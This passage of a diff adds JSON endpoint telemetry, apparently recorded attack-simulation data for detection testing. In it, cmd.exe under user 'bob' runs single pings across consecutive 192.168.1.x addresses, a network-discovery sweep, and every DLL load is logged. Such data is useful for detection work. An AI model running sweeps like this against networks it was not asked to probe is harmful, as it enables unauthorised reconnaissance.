"image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3288, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572572140000, + "unique_pid": "{42FC7E13-CB89-5C05-0000-001021B75201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3288, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572572140000, + "unique_pid": "{42FC7E13-CB89-5C05-0000-001021B75201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3288, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572572140000, + "unique_pid": "{42FC7E13-CB89-5C05-0000-001021B75201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3288, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572572140000, + "unique_pid": "{42FC7E13-CB89-5C05-0000-001021B75201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3288, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572572300000, + "unique_pid": "{42FC7E13-CB89-5C05-0000-001021B75201}" + }, + { + "event_type": "process", + "pid": 3288, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572576990000, + "unique_pid": "{42FC7E13-CB89-5C05-0000-001021B75201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.122", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 820, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572577140000, + "unique_pid": "{42FC7E13-CB89-5C05-0000-001091B95201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 820, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572577140000, + "unique_pid": "{42FC7E13-CB89-5C05-0000-001091B95201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 820, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572577140000, + "unique_pid": "{42FC7E13-CB89-5C05-0000-001091B95201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 820, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572577140000, + "unique_pid": "{42FC7E13-CB89-5C05-0000-001091B95201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 820, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572577140000, + "unique_pid": "{42FC7E13-CB89-5C05-0000-001091B95201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 820, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572577140000, + "unique_pid": "{42FC7E13-CB89-5C05-0000-001091B95201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 820, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572577140000, + "unique_pid": "{42FC7E13-CB89-5C05-0000-001091B95201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 820, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572577140000, + "unique_pid": "{42FC7E13-CB89-5C05-0000-001091B95201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 820, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572577140000, + "unique_pid": "{42FC7E13-CB89-5C05-0000-001091B95201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 820, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572577140000, + "unique_pid": "{42FC7E13-CB89-5C05-0000-001091B95201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 820, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572577140000, + "unique_pid": "{42FC7E13-CB89-5C05-0000-001091B95201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 820, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572577140000, + "unique_pid": "{42FC7E13-CB89-5C05-0000-001091B95201}" + }, + { + "event_type": "process", + "pid": 820, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572581830000, + "unique_pid": "{42FC7E13-CB89-5C05-0000-001091B95201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.123", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4944, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572581980000, + "unique_pid": "{42FC7E13-CB8A-5C05-0000-001011BC5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4944, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572581980000, + "unique_pid": "{42FC7E13-CB8A-5C05-0000-001011BC5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4944, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572581980000, + "unique_pid": "{42FC7E13-CB8A-5C05-0000-001011BC5201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4944, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572581980000, + "unique_pid": "{42FC7E13-CB8A-5C05-0000-001011BC5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4944, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572581980000, + "unique_pid": "{42FC7E13-CB8A-5C05-0000-001011BC5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4944, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572581980000, + "unique_pid": "{42FC7E13-CB8A-5C05-0000-001011BC5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4944, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572581980000, + "unique_pid": "{42FC7E13-CB8A-5C05-0000-001011BC5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4944, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572581980000, + "unique_pid": "{42FC7E13-CB8A-5C05-0000-001011BC5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4944, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572581980000, + "unique_pid": "{42FC7E13-CB8A-5C05-0000-001011BC5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4944, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572581980000, + "unique_pid": "{42FC7E13-CB8A-5C05-0000-001011BC5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4944, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572581980000, + "unique_pid": "{42FC7E13-CB8A-5C05-0000-001011BC5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4944, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572581980000, + "unique_pid": "{42FC7E13-CB8A-5C05-0000-001011BC5201}" + }, + { + "event_type": "process", + "pid": 4944, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572586990000, + "unique_pid": "{42FC7E13-CB8A-5C05-0000-001011BC5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.124", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7460, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572587140000, + "unique_pid": "{42FC7E13-CB8A-5C05-0000-001086BE5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7460, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572587140000, + "unique_pid": "{42FC7E13-CB8A-5C05-0000-001086BE5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7460, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572587140000, + "unique_pid": "{42FC7E13-CB8A-5C05-0000-001086BE5201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7460, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572587140000, + "unique_pid": "{42FC7E13-CB8A-5C05-0000-001086BE5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7460, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572587140000, + "unique_pid": "{42FC7E13-CB8A-5C05-0000-001086BE5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7460, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572587140000, + "unique_pid": "{42FC7E13-CB8A-5C05-0000-001086BE5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7460, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572587140000, + "unique_pid": "{42FC7E13-CB8A-5C05-0000-001086BE5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7460, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572587140000, + "unique_pid": "{42FC7E13-CB8A-5C05-0000-001086BE5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7460, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572587140000, + "unique_pid": "{42FC7E13-CB8A-5C05-0000-001086BE5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7460, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572587140000, + "unique_pid": "{42FC7E13-CB8A-5C05-0000-001086BE5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7460, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572587140000, + "unique_pid": "{42FC7E13-CB8A-5C05-0000-001086BE5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7460, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572587140000, + "unique_pid": "{42FC7E13-CB8A-5C05-0000-001086BE5201}" + }, + { + "event_type": "process", + "pid": 7460, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572591990000, + "unique_pid": "{42FC7E13-CB8A-5C05-0000-001086BE5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.125", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1376, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572592140000, + "unique_pid": "{42FC7E13-CB8B-5C05-0000-001004C15201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 1376, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572592140000, + "unique_pid": "{42FC7E13-CB8B-5C05-0000-001004C15201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1376, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572592140000, + "unique_pid": "{42FC7E13-CB8B-5C05-0000-001004C15201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1376, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572592140000, + "unique_pid": "{42FC7E13-CB8B-5C05-0000-001004C15201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1376, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572592140000, + "unique_pid": "{42FC7E13-CB8B-5C05-0000-001004C15201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1376, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572592140000, + "unique_pid": "{42FC7E13-CB8B-5C05-0000-001004C15201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 1376, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572592140000, + "unique_pid": "{42FC7E13-CB8B-5C05-0000-001004C15201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 1376, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572592140000, + "unique_pid": "{42FC7E13-CB8B-5C05-0000-001004C15201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 1376, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572592140000, + "unique_pid": "{42FC7E13-CB8B-5C05-0000-001004C15201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 1376, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572592140000, + "unique_pid": "{42FC7E13-CB8B-5C05-0000-001004C15201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 1376, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572592140000, + "unique_pid": "{42FC7E13-CB8B-5C05-0000-001004C15201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 1376, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572592140000, + "unique_pid": "{42FC7E13-CB8B-5C05-0000-001004C15201}" + }, + { + "event_type": "process", + "pid": 1376, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572596990000, + "unique_pid": "{42FC7E13-CB8B-5C05-0000-001004C15201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.126", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6080, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572597140000, + "unique_pid": "{42FC7E13-CB8B-5C05-0000-001078C35201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6080, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572597140000, + "unique_pid": "{42FC7E13-CB8B-5C05-0000-001078C35201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6080, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572597140000, + "unique_pid": "{42FC7E13-CB8B-5C05-0000-001078C35201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6080, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572597140000, + "unique_pid": "{42FC7E13-CB8B-5C05-0000-001078C35201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6080, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572597140000, + "unique_pid": "{42FC7E13-CB8B-5C05-0000-001078C35201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6080, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572597140000, + "unique_pid": "{42FC7E13-CB8B-5C05-0000-001078C35201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6080, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572597140000, + "unique_pid": "{42FC7E13-CB8B-5C05-0000-001078C35201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6080, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572597140000, + "unique_pid": "{42FC7E13-CB8B-5C05-0000-001078C35201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6080, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572597140000, + "unique_pid": "{42FC7E13-CB8B-5C05-0000-001078C35201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6080, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572597140000, + "unique_pid": "{42FC7E13-CB8B-5C05-0000-001078C35201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6080, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572597140000, + "unique_pid": "{42FC7E13-CB8B-5C05-0000-001078C35201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6080, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572597140000, + "unique_pid": "{42FC7E13-CB8B-5C05-0000-001078C35201}" + }, + { + "event_type": "process", + "pid": 6080, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572601830000, + "unique_pid": "{42FC7E13-CB8B-5C05-0000-001078C35201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.127", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6392, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572601990000, + "unique_pid": "{42FC7E13-CB8C-5C05-0000-0010F6C55201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6392, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572601980000, + "unique_pid": "{42FC7E13-CB8C-5C05-0000-0010F6C55201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6392, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572601980000, + "unique_pid": "{42FC7E13-CB8C-5C05-0000-0010F6C55201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6392, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572601980000, + "unique_pid": "{42FC7E13-CB8C-5C05-0000-0010F6C55201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6392, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572601980000, + "unique_pid": "{42FC7E13-CB8C-5C05-0000-0010F6C55201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6392, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572601980000, + "unique_pid": "{42FC7E13-CB8C-5C05-0000-0010F6C55201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6392, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572601980000, + "unique_pid": "{42FC7E13-CB8C-5C05-0000-0010F6C55201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6392, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572601980000, + "unique_pid": "{42FC7E13-CB8C-5C05-0000-0010F6C55201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6392, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572601980000, + "unique_pid": "{42FC7E13-CB8C-5C05-0000-0010F6C55201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6392, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572601980000, + "unique_pid": "{42FC7E13-CB8C-5C05-0000-0010F6C55201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6392, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572601980000, + "unique_pid": "{42FC7E13-CB8C-5C05-0000-0010F6C55201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6392, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572601980000, + "unique_pid": "{42FC7E13-CB8C-5C05-0000-0010F6C55201}" + }, + { + "event_type": "process", + "pid": 6392, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572606990000, + "unique_pid": "{42FC7E13-CB8C-5C05-0000-0010F6C55201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.128", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 764, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572607140000, + "unique_pid": "{42FC7E13-CB8C-5C05-0000-001066C85201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572607140000, + "unique_pid": "{42FC7E13-CB8C-5C05-0000-001066C85201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572607140000, + "unique_pid": "{42FC7E13-CB8C-5C05-0000-001066C85201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572607140000, + "unique_pid": "{42FC7E13-CB8C-5C05-0000-001066C85201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": 